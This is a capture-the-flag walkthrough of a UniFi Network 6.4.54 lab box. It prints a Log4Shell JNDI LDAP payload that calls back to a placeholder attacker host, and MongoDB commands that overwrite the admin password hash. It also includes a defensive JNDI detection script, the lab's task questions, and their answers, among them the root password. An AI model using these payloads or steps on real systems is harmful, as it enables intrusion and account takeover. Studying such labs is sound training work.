$ unified.pwn()
UniFi Network 6.4.54 on port 8443 is vulnerable to Log4Shell (CVE-2021-44228). A JNDI LDAP payload in the remember field of the login request triggers an outbound LDAP callback from the target, which we confirm with tcpdump listening on port 389. We then enumerate MongoDB (port 27117), replace the administrator's password hash with one we know, log in to the UniFi console, and read the root SSH credentials from its settings.
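From the defender's side, the same payload shape is easy to spot at the web tier. The following is an added example, not part of the original writeup: it parses a UniFi /api/login JSON body (the field names username, password, remember and strict follow the login request; the sample bodies and callback address are constructed) and reports any string field carrying a JNDI lookup, including nested objects and non-JSON bodies.

```python
# Added example (not from the writeup): flag JNDI lookups in UniFi /api/login bodies.
import json
import re
from typing import Optional

# A JNDI lookup: ${jndi:<proto>://<host>[:<port>][/<path>]
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<proto>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?",
    re.IGNORECASE,
)
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}  # used when the payload omits a port

def find_jndi(value: str) -> Optional[dict]:
    """Return proto/host/port/path of the first JNDI lookup in value, or None."""
    m = JNDI_RE.search(value)
    if not m:
        return None
    proto = m["proto"].lower()
    port = int(m["port"]) if m["port"] else DEFAULT_PORTS.get(proto)
    return {"proto": proto, "host": m["host"], "port": port, "path": m["path"] or ""}

def _walk(node, prefix=""):
    """Yield (dotted_field, value) for every string anywhere in a JSON document."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from _walk(v, f"{prefix}.{k}" if prefix else k)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from _walk(v, f"{prefix}[{i}]")
    elif isinstance(node, str):
        yield prefix, node

def inspect_login_body(body: str) -> list:
    """Report every field carrying a JNDI lookup; non-JSON bodies are scanned raw."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        hit = find_jndi(body)
        return [dict(field="<raw>", **hit)] if hit else []
    return [dict(field=f, **hit) for f, s in _walk(doc) if (hit := find_jndi(s))]

# Constructed samples: the first mirrors the payload shape from the session
# (placeholder callback address); the second is a benign login with a boolean "remember".
SAMPLES = [
    '{"username":"admin","password":"x","remember":"${jndi:ldap://10.10.14.x:389/o=tomcat}","strict":true}',
    '{"username":"admin","password":"hunter2","remember":true,"strict":true}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_login_body(body) or "clean")
```

The reported host and port are exactly what an analyst needs to pivot into egress logs: a callback to that address on that port confirms the lookup was actually resolved by the server.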
Terminal Session
# Scan — 4 open ports
nmap -sVC 10.129.x.x
# 22/tcp ssh
# 6789/tcp http
# 8080/tcp http-proxy
# 8443/tcp UniFi Network 6.4.54
# Log4Shell payload in POST /api/login:
# "remember": "${jndi:ldap://10.10.14.x:389/o=tomcat}"
# Start tcpdump listener on port 389
tcpdump -i tun0 port 389
# Verify LDAP callback received from target
# MongoDB enumeration (port 27117)
mongo --port 27117
use ace
db.admin.find()
# Returns admin user with password hash
# Update admin password hash to known bcrypt hash
db.admin.update(
{"name": "administrator"},
{$set: {"x_shadow": "<new-bcrypt-hash>"}}
)
# Log in to UniFi as administrator with the new password
# Read root SSH credentials from Settings → Site
# SSH password: NotAcrackablePassword4U2022
[✓] Root access obtained — flags captured!

Tasks (12)
Which are the first four open ports?
What is the title of the software that is running on port 8443?
What is the version of the software that is running?
What is the CVE for the identified vulnerability?
What protocol does JNDI leverage in the injection?
What tool do we use to intercept the traffic, indicating the attack was successful?
What port do we need to inspect intercepted traffic for?
What port is the MongoDB service running on?
What is the default database name for UniFi applications?
What is the function we use to enumerate users within the database in MongoDB?
What is the function we use to update users within the database in MongoDB?
What is the password for the root user?